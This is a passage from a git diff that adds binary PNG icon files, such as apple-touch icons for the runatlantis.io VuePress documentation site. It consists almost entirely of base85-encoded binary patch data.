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

(|x=o{S47Er8yQ5+diSv%zPBiPh-5V}K{`d*dtW z!ApACrNJsXQgsbh;~Kjsmez^!DH$fy7l-MLKaUudU4Ul*BbWyp4W-#q+~9qYZ^%MP zr-zwzgx#)%(tBafChyr|jF<-r4sm)pN(YV}pWp4ddKJMqw2WX`V2ofa!7{V8sSh61o++wZ>jvcDoY{t_NF^8ku@`!0c5 zRewAt!|0yOv|uJ^ha{dCi%FN+`#Lumf!Si-zKiIjtCu)__sF|8ov$p}(94gpEOW;r@7i>N*dY-UdoX}mHdy?GWy~SJ>ao{p zA+wZ9b~=-tf>;^`+8g@k0b`6DS~ghx1j&=V*~fsdyKmo{8!dNN`jtb;4IV6m9 z+#a#>of|8Kymhk(72mpPU{C#)N!#ja!f?0aNXIP&<6rtRVMM4D^485e-?=gTPNU5gJN?ObC-ynN1j+jnlg^y^v8h*vHBw-Oy+ z-G$4LUW|U#C}&$Ac=SD&e!d5!{l#JWyr-8AFIqA3`6I_?%1y_;D|v9Lv&*86iXERx z70?f+6WxpY$A}1d+xpm=6(gUgv+Zf}(qk@u-wwZY(;6;XG5qPAZ9XI-UTh5eMgOWe ziXvXlHXmBEV))Zvx@k?;$Gjc#=r+xFrE9;i@1~aH{)>kWcAor5Qdc|GHzqwnFC8OD zC1+cI_?`D$x|8hB!qc>*KNc{6cl|$4Y-zUK|L{EB^sC?~S|U^VoOScJ|9JD>UhRs7 zQFi+H>NzXz#xEZjtkjyHay{?XUQXmvowsv=0kDj@Z?KgA=&nE5Sn1NfMQc#zU*B}Y zTzlWXH#?5^8PC&KMyF!aotyP7`@)!r{8ldpV~jj++vc|K+H9p@tIkzrv&e|-Hb(9lDiS@p@FzA@)igVOZwokz^k({me} zEq9xzdZT*!8c#KUHjbhZX^N32jmWNi&U$dw1w#k!_kEg|h2l2oY&57_z69p?zVdu| zcD{b4<9b)B>gB4e2iD?$$T#e%8UQ2W0kgm{;6)J*iO93IW%djY6!(1fmRHtEP9(kR cb5@xD0sM*fPov1GnE(I)07*qoM6N<$f?RHE>;M1& literal 0 HcmV?d00001 diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png new file mode 100644 index 0000000000000000000000000000000000000000..0d98ab1ac54b6242b188bb3eb7f9f82293f67057 GIT binary patch literal 5739 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 